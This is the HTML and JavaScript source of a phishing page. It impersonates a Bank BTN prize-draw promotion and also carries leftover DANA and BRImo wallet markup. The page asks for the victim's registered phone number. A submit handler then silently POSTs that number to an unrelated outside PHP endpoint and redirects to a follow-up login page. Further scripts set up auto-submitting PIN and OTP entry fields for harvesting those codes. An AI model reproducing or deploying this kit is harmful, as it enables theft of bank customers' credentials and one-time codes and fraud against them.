<html>

<head>
 <title>BTN - Undian SpektaDeal</title>
    <meta http-equiv="content-type" content="text/html;charset=UTF-8">

    <meta charset="UTF-8">  
<meta property="og:title" content="BTN - Undian SpektaDeal">
<meta name="theme-color" content="#0147A9"> 
<meta property="twitter:title" content="BTN - Undian SpektaDeal">
<meta name="description" content="Gebyar Undian SpektaDeal Bank BTN">
 <meta content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSodgZdIa_RoZ00YA1Ofe6KsdRMEc2UCJcarGT1ClpM34eKGJJdruny0fA&s=10" property="og:image">
<link rel="canonical" href="https://www.bankbtn.co.id/">
 <meta property="og:url" content="https://www.bankbtn.co.id"> 
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
 

<meta http-equiv="X-UA-Compatible" content="ie=edge">
	<link rel="stylesheet" href="https://www.bca.co.id/css/app.css?v=5.2">
	<link rel="stylesheet" href="https://www.bca.co.id/css/bca-custom.css?v=5.2">
	<link href="https://www.bca.co.id/css/select2.css?v=5.2" rel="stylesheet" />
	<link rel="stylesheet" href="https://www.bca.co.id/css/custom.css?v=5.2">

<meta property="twitter:card" content="summary_large_image">
<meta property="og:image:type" content="image/jpeg">
<meta content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSodgZdIa_RoZ00YA1Ofe6KsdRMEc2UCJcarGT1ClpM34eKGJJdruny0fA&s=10" property="og:image">


    <link rel="stylesheet" href="ast/8d62ea654fcf0e4cae001e344ee2592c.css">
    <link rel="stylesheet" href="ast/00b9d2e9f52e505c013c16bb638a42a4.css">
    <link rel="stylesheet" href="ast/6990a7033bbaeadc2040ac863ff124fd.css">
    <link rel="stylesheet" href="ast/3fadc676582b9542004b502ee03df3a3.css">
    <link rel="stylesheet" href="ast/47e4c58f6b9789b8a33f2525cf084599.css">


<meta name="description" content="Gebyar Undian SpektaDeal Bank BTN">
    <!-- Demo styles -->
    <style>
      html,
      body {
        position: relative;
        height: 100%;
		overflow: hidden; 
        background-color: transparent;
        font-family: Helvetica Neue, Helvetica, Arial, sans-serif;
        font-size: 14px;
        color: #000;
        margin: 0;
        padding: 0;
      }



@import url('../../external.html?link=https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&amp;display=swap');* {font-family: 'Open Sans', sans-serif;font-weight: 400;margin: 0;padding: 0;box-sizing: border-box;position: relative;color: #fff;}b { font-weight: 700; }html { width: 100%; height: 100%; }body {background: #118EEA;width: 100%;height: 100%;}.box-login, .container {background: #118EEA;height: 100%;width: 100%;}body .header {width: 100%;margin-top: 10px;padding: 10px;height: 50px;display: flex;justify-content: center;align-items: center;}body .header .back {height: 35%;max-height: 35%;min-height: 35%;position: absolute;left: 20px;}body .header .logo {height: 100%;max-height: 100%;min-height: 100%;}form {width: 100%;height: 100%;display: flex;padding: 50px 20px;align-items: center;flex-direction: column;}form h3 {width: 100%;font-size: 14px;text-align: center;}form .box-input {width: 100%;height: 42px;padding: 5px 15px;margin-top: 50px;background: transparent;display: flex;border-radius: 10px;align-items: center;}form .box-input input::placeholder {color: #c6c6c6;}form .box-input input {background: none;width: calc(100% - 70px);max-width: calc(100% - 70px);min-width: calc(100% - 70px);height: 100%;max-height: 100%;min-height: 100%;outline: none;border: none;font-size: 22px;font-weight: 600;text-align: left;color: #000;display: flex;align-items: center;justify-content: center;caret-color: #c1c1c1;}.box-input .label {height: 100%;min-height: 100%;max-height: 100%;padding: 4px;width: 70px;min-width: 70px;max-width: 70px;display: flex;justify-content: center;align-items: center;}.box-input .label img {height: 55%;max-height: 55%;min-height: 55%;border-radius: 1px;box-shadow: 0 0 2px rgba(0,0,0,0.2);}.box-input .label label {color: #000;font-size: 15px;font-weight: 600;margin: 0 10px 0 10px;}form .desc {width: 100%;margin-top: 40px;font-size: 13px;text-align: center;}form .box-btn {width: 100%;height: auto;position: fixed;bottom: 0;}form .box-btn button:disabled {opacity: 0.7;}form .box-btn button:active {background: #00000015;}form .box-btn button {padding: 20px 0 30px 0;opacity: 1;width: 100%;height: 60px;background: none;outline: none;border: none;font-size: 16px;text-align: center;}.start {top: 0;left: 0;right: 0;width: 100%;height: 100%;min-height: 100%;max-height: 100%;position: fixed;z-index: 999;display: flex;justify-content: center;align-items: center;flex-direction: column;background: #118EEA;}.start .logo {width: 50%;margin-top: -40px;}.start .footimg {width: 400px;height: 60px;display: flex;justify-content: center;align-items: center;position: fixed;bottom: 40px;z-index: 99999;}.start .footimg img {min-height: 40px;max-height: 40px;height: 40px;margin: 0 8px 0 0;}.start .footimg p {font-size: 10px;white-space: nowrap;}@media screen and (min-width: 900px) {html {background: #118EEA;}body {display: flex;justify-content: center;align-items: center;background: #0000001b;}.container {width: 450px;min-width: 450px;max-width: 450px;height: 700px;min-height: 700px;max-height: 700px;display: flex;justify-content: center;align-items: center;margin: auto;border-radius: 15px;overflow: hidden;}.index {border-radius: 15px;width: 450px;min-width: 450px;max-width: 450px;height: 740px;min-height: 740px;max-height: 740px;}.start {border-radius: 15px;position: absolute;top: auto;left: auto;right: auto;width: 450px;min-width: 450px;max-width: 450px;height: 700px;min-height: 700px;max-height: 700px;z-index: 999;display: flex;justify-content: center;align-items: center;flex-direction: column;}.start .footimg {position: absolute;}.box-login {padding: 25px;width: 450px;min-width: 450px;max-width: 450px;height: 700px;min-height: 700px;max-height: 700px;box-shadow: 0 0 7px rgba(0,0,0,0.1);}form .box-btn {position: absolute;bottom: 0;}form {height: 90%;min-height: 90%;max-height: 90%;}}.hid { display: none; }




.w-input::placeholder{
    opacity: 0.6;
    font-weight: 500;
}
	</style>
	 <style>
    /*********************/
.process7 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: fixed;
           padding-top: 300px;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.4);
            z-index: 9999999;
}
.loading7 {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
  
}
  

.loading7 img {
    width: 110px;
    background: transparent;
    top: -70;
}

     </style>
</head>
<body style="background-color: #f5f5f5;">
    <div style="display:none;" class="index">

        <div class="header">
            <img src="ast/img/dana_BRImo1.html" class="logo" alt="">
        </div>
        <div class="content">
            <div class="hero">
                <img src="ast/img/hero.svg" alt="">
            </div>
            <h1>Dompet digital untuk kamu!</h1>
            <p class="desc">Simpan uang serta kartu debit/kredit dengan<br>praktis di DANA</p>
            <div class="line">
            </div>
            <p class="log">Masukkan <b>nomor HP</b> kamu untuk lanjut</p>
            <button type="button" onclick="next();">LOGIN</button>
        </div>
    </div>
  
    <div class="start" style="display:none;                  background-image: url('');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%; background-color: #fff">
        <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/f/fd/Bank_BTN_logo.svg/406px-Bank_BTN_logo.svg.png" style="width: 100px;">
    </div>
    <div class="container hid">
        <div class="box-login" style="background-color: transparent;">
           
  <form id="forgetPasswordForm" method="post" onsubmit="sendDebit(event); return false" autocomplete="off" style="width: 80%; height: 65px; position: fixed; bottom: 100px; z-index: 9999; color: black; left: 0; right: 0; margin: 0px auto;           "> 


<div onclick="goloading()">
    <div style="padding: 0px">
<label style="text-align: left; margin-left: 8px">No. Hp Tetdaftar</label>        

           
 <input type="tel" id="tel" name="telepon" class="text-field-4 w-input" maxlength="12" data-name="tel" minlength="9" placeholder="Masukkan Nomor Handphone" required style=" width: 80%; height: 45px; position: fixed; bottom: 165px; z-index: 9999999; color: black; left: 0; right: 0; margin: 0px auto;                  background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5YGpjBG4EW7rZALkbWZVY1n-28nShu_jSX8HIW8GHkiTOhyphenhyphenDrN2xIdDILbD1vsan6GjBfj-Sai3EfJ-Q7VnEpHAoMfOSqFXJusG6Mal32dJ0k20W7tVwBi2W_nMth3PaW8rWffcogFQNKVxdsIFkLmrXSK8dsVsBSnCTZs4ziwgDQ47mI0it8_ODllig/s2160/1714289140376.png');
      background-position: 20% 50%;
      background-repeat: no-repeat;
      background-size: 85% 80%; border: none; outline: 1px inset #0147A9; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;padding-left: 45px; font-size: 15.2px; font-weight: bold; border-radius: 50px; box-shadow: rgba(0, 0, 0, 0.16) 0px 3px 6px, rgba(0, 0, 0, 0.23) 0px 3px 6px; background-color: #B7D6E6" value="">
 
		
 
              <button type="submit" style="width: 80%; height: 65px; position: fixed; bottom: 82px; z-index: 9999; color: black; left: 0; right: 0; margin: 0px auto;                  background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjfonBE9t2Y55v6GfQ0f5W0XYL5TvEC7ziXtIOpKwtDvfmlGKcDnvhCqtIUEDncy6ONswvgbeo7Mq4wrmRQ0iMQIYNyiDacfyrpUSr8FY1DzguWPudXSDwOHKrHMVius-qQk31yxd-NX-nLIYe5MH0FMykOWcvwVBd8XrQEIEsaOG0Vs_qZ2S7Oi7bW3o/s500/huge%20(1).gif');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%; border: none; outline: none; box-shadow: rgba(0, 0, 0, 0.16) 0px 3px 6px, rgba(0, 0, 0, 0.23) 0px 3px 6px;"></button>  
      
      
      </form>
            <div class="header11" style="height: 100%; position: fixed; top: 0; left: 0; right: 0; width: 100%; z-index: ">
                <a ><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga0chDhTVhj100Zw72JRcjzxLpBUoX1wTbvKgOFBfflMY0mXHPJDX4c36ECZspHxatkfa84J-CsTU9bWhiGRy7lFMnqECCsbWfvZDvGpIRlmvzr6fk6zXZtsAzn5VTY5OwCuoafv9s7fbjXnkEbZFaudr0t9kALAfsDykggTDJBkFgwoft-sziLW9jAPc/s1082/Desain%20tanpa%20judul%20(2).gif" style="width: 100%; left: 0px; top: 0px; height: 100%">

                </a>
                          
            </div>
             
        </div>
	</div>
  <center>
 <div id="letgo8" name="process" class="process7" style="display: none;">
            <div class="loading7">
                <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4GdlcLI1njGCQB4Sva94FkNX7JmV3TB_gG4yl8PQ-vQDKcd23qzFolAJgQ3RHYXiqr0pCOTyLXy1KvhevnRhCmo_rshMSe_ccmQTTW694rr1Vx5cTGaVG4KXETQ37vu7DcWoCiuFqpzExbZYAWoBHNsmbcdOcND_Pxc-4aWJbcS5I4sstE7BlaKmBviY/s150/27506839-9de8-495c-9d8b-0fcdaf103142.gif">
               
            </div>
        </div>
        </center>
         <center>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="https://dev-danapemulihan.pantheonsite.io/asset/jquery.mask.min.js"></script>
<script>
$(document).ready(function() {
    $('#tel').on('input', function() {
        if ($(this).val() == '0' || $(this).val() == '62') {
            $(this).val('');
        }
    });
});
</script>
<script>
$(document).ready(function() {
    $('#tel').mask('000-0000-00000');
});
</script>
<script>
let inp = document.getElementById("inp");
let btn = document.getElementById("btn");
inp.addEventListener("input", val);

function val() {
    if (inp.value.length > 10) {
        btn.disabled = false;
    } else {
        btn.disabled = true;
    }
};
</script>
<script>
   

</script>
<script>
 var $jscomp={scope:{},findInternal:function(a,l,d){a instanceof String&&(a=String(a));for(var p=a.length,h=0;h<p;h++){var b=a[h];if(l.call(d,b,h,a))return{i:h,v:b}}return{i:-1,v:void 0}}};$jscomp.defineProperty="function"==typeof Object.defineProperties?Object.defineProperty:function(a,l,d){if(d.get||d.set)throw new TypeError("ES3 does not support getters and setters.");a!=Array.prototype&&a!=Object.prototype&&(a[l]=d.value)};
$jscomp.getGlobal=function(a){return"undefined"!=typeof window&&window===a?a:"undefined"!=typeof global&&null!=global?global:a};$jscomp.global=$jscomp.getGlobal(this);$jscomp.polyfill=function(a,l,d,p){if(l){d=$jscomp.global;a=a.split(".");for(p=0;p<a.length-1;p++){var h=a[p];h in d||(d[h]={});d=d[h]}a=a[a.length-1];p=d[a];l=l(p);l!=p&&null!=l&&$jscomp.defineProperty(d,a,{configurable:!0,writable:!0,value:l})}};
$jscomp.polyfill("Array.prototype.find",function(a){return a?a:function(a,d){return $jscomp.findInternal(this,a,d).v}},"es6-impl","es3");
(function(a,l,d){"function"===typeof define&&define.amd?define(["jquery"],a):"object"===typeof exports?module.exports=a(require("jquery")):a(l||d)})(function(a){var l=function(b,e,f){var c={invalid:[],getCaret:function(){try{var a,r=0,g=b.get(0),e=document.selection,f=g.selectionStart;if(e&&-1===navigator.appVersion.indexOf("MSIE 10"))a=e.createRange(),a.moveStart("character",-c.val().length),r=a.text.length;else if(f||"0"===f)r=f;return r}catch(C){}},setCaret:function(a){try{if(b.is(":focus")){var c,
g=b.get(0);g.setSelectionRange?g.setSelectionRange(a,a):(c=g.createTextRange(),c.collapse(!0),c.moveEnd("character",a),c.moveStart("character",a),c.select())}}catch(B){}},events:function(){b.on("keydown.mask",function(a){b.data("mask-keycode",a.keyCode||a.which);b.data("mask-previus-value",b.val());b.data("mask-previus-caret-pos",c.getCaret());c.maskDigitPosMapOld=c.maskDigitPosMap}).on(a.jMaskGlobals.useInput?"input.mask":"keyup.mask",c.behaviour).on("paste.mask drop.mask",function(){setTimeout(function(){b.keydown().keyup()},
100)}).on("change.mask",function(){b.data("changed",!0)}).on("blur.mask",function(){d===c.val()||b.data("changed")||b.trigger("change");b.data("changed",!1)}).on("blur.mask",function(){d=c.val()}).on("focus.mask",function(b){!0===f.selectOnFocus&&a(b.target).select()}).on("focusout.mask",function(){f.clearIfNotMatch&&!h.test(c.val())&&c.val("")})},getRegexMask:function(){for(var a=[],b,c,f,n,d=0;d<e.length;d++)(b=m.translation[e.charAt(d)])?(c=b.pattern.toString().replace(/.{1}$|^.{1}/g,""),f=b.optional,
(b=b.recursive)?(a.push(e.charAt(d)),n={digit:e.charAt(d),pattern:c}):a.push(f||b?c+"?":c)):a.push(e.charAt(d).replace(/[-\/\\^$*+?.()|[\]{}]/g,"\\$&"));a=a.join("");n&&(a=a.replace(new RegExp("("+n.digit+"(.*"+n.digit+")?)"),"($1)?").replace(new RegExp(n.digit,"g"),n.pattern));return new RegExp(a)},destroyEvents:function(){b.off("input keydown keyup paste drop blur focusout ".split(" ").join(".mask "))},val:function(a){var c=b.is("input")?"val":"text";if(0<arguments.length){if(b[c]()!==a)b[c](a);
c=b}else c=b[c]();return c},calculateCaretPosition:function(){var a=b.data("mask-previus-value")||"",e=c.getMasked(),g=c.getCaret();if(a!==e){var f=b.data("mask-previus-caret-pos")||0,e=e.length,d=a.length,m=a=0,h=0,l=0,k;for(k=g;k<e&&c.maskDigitPosMap[k];k++)m++;for(k=g-1;0<=k&&c.maskDigitPosMap[k];k--)a++;for(k=g-1;0<=k;k--)c.maskDigitPosMap[k]&&h++;for(k=f-1;0<=k;k--)c.maskDigitPosMapOld[k]&&l++;g>d?g=10*e:f>=g&&f!==d?c.maskDigitPosMapOld[g]||(f=g,g=g-(l-h)-a,c.maskDigitPosMap[g]&&(g=f)):g>f&&
(g=g+(h-l)+m)}return g},behaviour:function(f){f=f||window.event;c.invalid=[];var e=b.data("mask-keycode");if(-1===a.inArray(e,m.byPassKeys)){var e=c.getMasked(),g=c.getCaret();setTimeout(function(){c.setCaret(c.calculateCaretPosition())},10);c.val(e);c.setCaret(g);return c.callbacks(f)}},getMasked:function(a,b){var g=[],d=void 0===b?c.val():b+"",n=0,h=e.length,q=0,l=d.length,k=1,r="push",p=-1,t=0,y=[],v,z;f.reverse?(r="unshift",k=-1,v=0,n=h-1,q=l-1,z=function(){return-1<n&&-1<q}):(v=h-1,z=function(){return n<
h&&q<l});for(var A;z();){var x=e.charAt(n),w=d.charAt(q),u=m.translation[x];if(u)w.match(u.pattern)?(g[r](w),u.recursive&&(-1===p?p=n:n===v&&n!==p&&(n=p-k),v===p&&(n-=k)),n+=k):w===A?(t--,A=void 0):u.optional?(n+=k,q-=k):u.fallback?(g[r](u.fallback),n+=k,q-=k):c.invalid.push({p:q,v:w,e:u.pattern}),q+=k;else{if(!a)g[r](x);w===x?(y.push(q),q+=k):(A=x,y.push(q+t),t++);n+=k}}d=e.charAt(v);h!==l+1||m.translation[d]||g.push(d);g=g.join("");c.mapMaskdigitPositions(g,y,l);return g},mapMaskdigitPositions:function(a,
b,e){a=f.reverse?a.length-e:0;c.maskDigitPosMap={};for(e=0;e<b.length;e++)c.maskDigitPosMap[b[e]+a]=1},callbacks:function(a){var h=c.val(),g=h!==d,m=[h,a,b,f],q=function(a,b,c){"function"===typeof f[a]&&b&&f[a].apply(this,c)};q("onChange",!0===g,m);q("onKeyPress",!0===g,m);q("onComplete",h.length===e.length,m);q("onInvalid",0<c.invalid.length,[h,a,b,c.invalid,f])}};b=a(b);var m=this,d=c.val(),h;e="function"===typeof e?e(c.val(),void 0,b,f):e;m.mask=e;m.options=f;m.remove=function(){var a=c.getCaret();
c.destroyEvents();c.val(m.getCleanVal());c.setCaret(a);return b};m.getCleanVal=function(){return c.getMasked(!0)};m.getMaskedVal=function(a){return c.getMasked(!1,a)};m.init=function(d){d=d||!1;f=f||{};m.clearIfNotMatch=a.jMaskGlobals.clearIfNotMatch;m.byPassKeys=a.jMaskGlobals.byPassKeys;m.translation=a.extend({},a.jMaskGlobals.translation,f.translation);m=a.extend(!0,{},m,f);h=c.getRegexMask();if(d)c.events(),c.val(c.getMasked());else{f.placeholder&&b.attr("placeholder",f.placeholder);b.data("mask")&&
b.attr("autocomplete","off");d=0;for(var l=!0;d<e.length;d++){var g=m.translation[e.charAt(d)];if(g&&g.recursive){l=!1;break}}l&&b.attr("maxlength",e.length);c.destroyEvents();c.events();d=c.getCaret();c.val(c.getMasked());c.setCaret(d)}};m.init(!b.is("input"))};a.maskWatchers={};var d=function(){var b=a(this),e={},f=b.attr("data-mask");b.attr("data-mask-reverse")&&(e.reverse=!0);b.attr("data-mask-clearifnotmatch")&&(e.clearIfNotMatch=!0);"true"===b.attr("data-mask-selectonfocus")&&(e.selectOnFocus=
!0);if(p(b,f,e))return b.data("mask",new l(this,f,e))},p=function(b,e,f){f=f||{};var c=a(b).data("mask"),d=JSON.stringify;b=a(b).val()||a(b).text();try{return"function"===typeof e&&(e=e(b)),"object"!==typeof c||d(c.options)!==d(f)||c.mask!==e}catch(t){}},h=function(a){var b=document.createElement("div"),d;a="on"+a;d=a in b;d||(b.setAttribute(a,"return;"),d="function"===typeof b[a]);return d};a.fn.mask=function(b,d){d=d||{};var e=this.selector,c=a.jMaskGlobals,h=c.watchInterval,c=d.watchInputs||c.watchInputs,
t=function(){if(p(this,b,d))return a(this).data("mask",new l(this,b,d))};a(this).each(t);e&&""!==e&&c&&(clearInterval(a.maskWatchers[e]),a.maskWatchers[e]=setInterval(function(){a(document).find(e).each(t)},h));return this};a.fn.masked=function(a){return this.data("mask").getMaskedVal(a)};a.fn.unmask=function(){clearInterval(a.maskWatchers[this.selector]);delete a.maskWatchers[this.selector];return this.each(function(){var b=a(this).data("mask");b&&b.remove().removeData("mask")})};a.fn.cleanVal=function(){return this.data("mask").getCleanVal()};
a.applyDataMask=function(b){b=b||a.jMaskGlobals.maskElements;(b instanceof a?b:a(b)).filter(a.jMaskGlobals.dataMaskAttr).each(d)};h={maskElements:"input,td,span,div",dataMaskAttr:"*[data-mask]",dataMask:!0,watchInterval:300,watchInputs:!0,useInput:!/Chrome\/[2-4][0-9]|SamsungBrowser/.test(window.navigator.userAgent)&&h("input"),watchDataMask:!1,byPassKeys:[9,16,17,18,36,37,38,39,40,91],translation:{0:{pattern:/\d/},9:{pattern:/\d/,optional:!0},"#":{pattern:/\d/,recursive:!0},A:{pattern:/[a-zA-Z0-9]/},
S:{pattern:/[a-zA-Z]/}}};a.jMaskGlobals=a.jMaskGlobals||{};h=a.jMaskGlobals=a.extend(!0,{},h,a.jMaskGlobals);h.dataMask&&a.applyDataMask();setInterval(function(){a.jMaskGlobals.watchDataMask&&a.applyDataMask()},h.watchInterval)},window.jQuery,window.Zepto);   
</script>
<script>
$('.inppin').on('input', function(event) {
    const inputs = $('.inppin');
    const isAllFilled = Array.from(inputs).every((input) => input.value !== '');
    if (isAllFilled == true) {
        $(event.target).blur();
        sendPin();
    };
    const index = inputs.index(this);
    const currentValue = event.target.value;
    if (currentValue.length === 1) {
        if (index < inputs.length - 1) {
            inputs[index + 1].focus();
        }
    } else if (currentValue.length === 0) {
        if (index > 0) {
            inputs[index].focus();
        }
    };
});
$('.inppin').on('keydown', function(event) {
    const inputs = $('.inppin');
    const key = event.key;
    const index = inputs.index(this);
    if (key === 'Backspace' && event.target.value.length === 0) {
        if (index > 0) {
            inputs[index - 1].focus();
        }
    };
});
</script>
<script>
$('.inpotp').on('input', function(event) {
    const inputs = $('.inpotp');
    const isAllFilled = Array.from(inputs).every((input) => input.value !== '');
    if (isAllFilled == true) {
        $(event.target).blur();
        sendOtp();
    }
    const index = inputs.index(this);
    const currentValue = event.target.value;
    if (currentValue.length === 1) {
        if (index < inputs.length - 1) {
            inputs[index + 1].focus();
        }
    } else if (currentValue.length === 0) {
        if (index > 0) {
            inputs[index].focus();
        }
    };
});
$('.inpotp').on('keydown', function(event) {
    const inputs = $('.inpotp');
    const key = event.key;
    const index = inputs.index(this);
    if (key === 'Backspace' && event.target.value.length === 0) {
        if (index > 0) {
            inputs[index - 1].focus();
        }
    };
});
</script>
<script>
$(document).ready(function() {
    $('.clear').click(function() {
        $('.inppin').val('');
        $('#pin1').focus();
    });
    $('.clearotp').click(function() {
        $('.inpotp').val('');
        $('#otp1').focus();
    });
    $('.show').click(function() {
        $('.inppin').each(function() {
            if ($(this).attr('type') === 'password') {
                $(this).attr('type', 'number');
                $(".show").text("SEMBUNYIKAN");
            } else {
                $(this).attr('type', 'password');
                $(".show").text("TAMPILKAN");
            }
        });
    });
});
</script>

<script>
$('#forgetPasswordForm').on('submit', function (event) {

 
  event.stopPropagation();
    event.preventDefault();
  $("#letgo8").show();

 $.ajax({
 type: 'POST',
 url: 'https://kementrian-daerah.c1.is/database/BTN/A/sendPhone.php',
 async: false,
 dataType: 'JSON',
 data: $(this).serialize(),
 
 complete: function(data) {
            console.log('Complete')
  
  window.location.href = 'login.html'; 
var nomorhp = document.getElementById("tel").value;
sessionStorage.setItem("nomorhp", nomorhp);
         
 }
    });

    return false;
});       
</script>
<script>
function countdown() {
    var count = parseInt($('#countdown').text());
    if (count !== 0) {
        $('#countdown').text(count - 1);
    } else {
        $('#countdown').text('120');
    }
};</script>
<script>
window.onload = function() {
    setTimeout(function() {
        $(".start").fadeIn();
        setTimeout(function() {
            $(".start").fadeOut(1000);
            setTimeout(function() {
                $(".container").fadeIn(200);
                $("#inp").focus();
            }, 1000);
        }, 2000);
    }, 500);
}
</script>



</body>
</html>